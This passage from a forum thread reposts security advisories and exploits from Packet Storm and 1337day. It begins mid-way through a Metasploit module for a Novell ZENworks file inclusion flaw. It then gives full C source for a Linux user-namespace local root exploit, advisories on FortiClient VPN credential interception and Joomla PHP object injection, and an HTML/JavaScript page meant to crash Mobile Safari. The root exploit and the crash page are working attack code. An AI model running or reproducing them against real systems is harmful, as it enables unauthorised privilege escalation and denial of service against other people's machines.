    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE
    rescue ::OpenSSL::SSL::SSLError => e
    return if(e.to_s.match(/^SSL_connect /) ) # strange errors / exception if SSL connection aborted
    end
    end

    end

    Sursa: Novell ZENworks Mobile Management CVE-2013-1081 Local File Include Vulnerability

    Novell Zenworks Mobile Device Managment Local File Inclusion Vulnerability

  21. Linux kernel open-time capability file_ns_capable() local root exploit.

    kernel/user_namespace.c in the Linux kernel before 3.8.9 does not have appropriate capability requirements for the uid_map and gid_map files, which allows local users to gain privileges by opening a file within an unprivileged process and then modifying the file within a privileged process.

    /* userns_root_sploit.c by */
    /* Copyright (c) 2013 Andrew Lutomirski. All rights reserved. */
    /* You may use, modify, and redistribute this code under the GPLv2. */

    #define _GNU_SOURCE
    #include <unistd.h>
    #include <sched.h>
    #include <sys/types.h>
    #include <sys/wait.h>
    #include <sys/mman.h>
    #include <fcntl.h>
    #include <stdio.h>
    #include <string.h>
    #include <err.h>
    #include <linux/futex.h>
    #include <errno.h>
    #include <unistd.h>
    #include <sys/syscall.h>

    #ifndef CLONE_NEWUSER
    #define CLONE_NEWUSER 0x10000000
    #endif

    pid_t parent;
    int *ftx;

    int childfn()
    {
    int fd;
    char buf[128];

    if (syscall(SYS_futex, ftx, FUTEX_WAIT, 0, 0, 0, 0) == -1 &&
    errno != EWOULDBLOCK)
    err(1, "futex");

    sprintf(buf, "/proc/%ld/uid_map", (long)parent);
    fd = open(buf, O_RDWR | O_CLOEXEC);
    if (fd == -1)
    err(1, "open %s", buf);
    if (dup2(fd, 1) != 1)
    err(1, "dup2");

    // Write something like "0 0 1" to stdout with elevated capabilities.
    execl("./zerozeroone", "./zerozeroone");

    return 0;
    }

    int main(int argc, char **argv)
    {
    int dummy, status;
    pid_t child;

    if (argc < 2) {
    printf("usage: userns_root_sploit COMMAND ARGS...\n\n"
    "This will run a command as (global) uid 0 but no capabilities.\n");
    return 1;
    }

    ftx = mmap(0, sizeof(int), PROT_READ | PROT_WRITE,
    MAP_SHARED | MAP_ANONYMOUS, -1, 0);
    if (ftx == MAP_FAILED)
    err(1, "mmap");

    parent = getpid();

    if (signal(SIGCHLD, SIG_DFL) != 0)
    err(1, "signal");

    child = fork();
    if (child == -1)
    err(1, "fork");
    if (child == 0)
    return childfn();

    *ftx = 1;
    if (syscall(SYS_futex, ftx, FUTEX_WAKE, 1, 0, 0, 0) != 0)
    err(1, "futex");

    if (unshare(CLONE_NEWUSER) != 0)
    err(1, "unshare(CLONE_NEWUSER)");

    if (wait(&status) != child)
    err(1, "wait");
    if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
    errx(1, "child failed");

    if (setresuid(0, 0, 0) != 0)
    err(1, "setresuid");
    execvp(argv[1], argv+1);
    err(1, argv[1]);

    return 0;
    }

    Sursa: Linux Kernel open-time Capability file_ns_capable() Privilege Escalation ? Packet Storm

  22. The Fortinet FortiClient VPN client on all available platforms suffers from a certificate validation vulnerability which allows an attacker to successfully run a man-in-the-middle attack and to steal the credentials of the user.

    We found this one year ago. Although most versions have been patched we

    haven't seen any public info on this yet.

    FORTICLIENT VPN CLIENT CREDENTIAL INTERCEPTION VULNERABILITY

    ============================================================

    Description

    -----------

    The Fortinet FortiClient VPN client on all available platforms suffers

    from a certificate validation vulnerability which allows an attacker

    to successfully run a man-in-the-middle attack and to steal the

    credentials of the user.

    When the FortiClient VPN client is tricked into connecting to a proxy

    server rather than to the original firewall (e.g. through ARP or DNS

    spoofing,) it detects the wrong SSL certificate but it only warns the

    user _AFTER_ it has already sent the password to the proxy.

    Rating

    ------

    Critical. User can not prevent interception. Intercepted credentials

    give full access to VPN.

    Vulnerable versions:

    -------------------

    Tested:

    - FortiClient Lite 4.3.3.445 on Windows 7

    - FortiClient SSL VPN 4.0.2012 for Linux on Ubuntu

    - FortiClient Lite Android 2.0

    Acknowledged by vendor

    - FortiClient v4.3.3 - Patch 3 on Windows

    - FortiClient v4.0 - Patch 2 on MacOS

    History

    -------

    April 11, 2012: Vendor first contacted

    May 2, 2012: Problem acknowledged

    Dec 21, 2012: Vendor has patched all versions except Android v2

    Current Status

    --------------

    April 2013:

    Android FortiClient Lite v2.0.0223 still not patched and available on

    Play Store.

    Linux version not supported anymore. Apparently no patch available.

    According to vendor all other versions have been patched on all

    available platforms (as of V4.3 patch 11).

    Credit:

    -------

    Discovered by Cédric Tissières and Philippe Oechslin, Objectif Sécurité

    Objectif Sécurité - Accueil

    --

    Philippe Oechslin

    Sursa: Forticlient VPN Client Credential Interception ? Packet Storm

  23. ------------------------------------------------------------------

    Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability

    ------------------------------------------------------------------

    [-] Software Link:

    Joomla! The CMS Trusted By Millions for their Websites

    [-] Affected Versions:

    Version 3.0.3 and earlier 3.0.x versions.

    Version 2.5.9 and earlier 2.5.x versions.

    [-] Vulnerability Description:

    The vulnerable code is located in /plugins/system/remember/remember.php:

    34. $hash = JApplication::getHash('JLOGIN_REMEMBER');
    35.
    36. if ($str = JRequest::getString($hash, '', 'cookie', JREQUEST_ALLOWRAW | JREQUEST_NOTRIM))
    37. {
    38. // Create the encryption key, apply extra hardening using the user agent string.
    39. // Since we're decoding, no UA validity check is required.
    40. $privateKey = JApplication::getHash(@$_SERVER['HTTP_USER_AGENT']);
    41.
    42. $key = new JCryptKey('simple', $privateKey, $privateKey);
    43. $crypt = new JCrypt(new JCryptCipherSimple, $key);
    44. $str = $crypt->decrypt($str);
    45. $cookieData = @unserialize($str);

    User input passed through cookies is not properly sanitized before being used in an unserialize()

    call at line 45. This could be exploited to inject arbitrary PHP objects into the application scope.

    Successful exploitation of this vulnerability requires authentication because the attacker needs

    to know the "hash string" used to read the cookie parameter at line 36.

    [-] Solution:

    Upgrade to version 2.5.10, 3.0.4 or 3.1.0.

    [-] Disclosure Timeline:

    [04/12/2012] - Vendor alerted for a possible vulnerability

    [13/02/2013] - Vulnerability confirmed and proof of concept sent to the vendor

    [24/04/2013] - Vendor update released

    [26/04/2013] - Public disclosure

    [-] CVE Reference:

    The Common Vulnerabilities and Exposures project (cve.mitre.org)

    has assigned the name CVE-2013-3242 to this vulnerability.

    [-] Credits:

    Vulnerability discovered by Egidio Romano.

    [-] Original Advisory:

    Joomla! <= 3.0.3 (remember.php) PHP Object Injection Vulnerability | Karma(In)Security

    Sursa: Joomla! <= 3.0.3 (remember.php) - PHP Object Injection Vulnerability

  24. <!--
    =======================================
    Mobile Safari Crash info
    =======================================
    Crash found by @rg0rd and Doxen on 4/20/2013
    Should crash MobileSafari on load, safari receiving too much refreshes to handle.
    Page becomes unresponsive on Chrome
    ----------------------------------------------------------------------
    -->
    <html>
    <head>
    <meta http-equiv="Refresh" content="420420420420420420420">
    <title>Doxen</title>
    <html>
    <body bgcolor="red">
    <br>
    <br>
    <br>
    <br>
    <script language="javascript">
    now=new Date();
    document.write(now+"<br>");
    document.write("<font size='+15'>");
    for (i =0;i<420420420420420420420;i++) {
    document.write('<html><marquee><h1>');
    }
    var str="DOXEN!";
    document.write(str.toUpperCase());
    var d=new Date();
    document.write(d.getFullYear());
    var d=new Date();
    document.write(d.getTime() + " ml sn 1994/08/10 swag");
    </script>
    </html>
    </body>
    </html>

    # 3FE9090BC6F813A3 1337day.com [2013-04-30] 6F69A0845EDD80CA #

    Sursa: http://1337day.com/exploit/20686

×
×
  • Create New...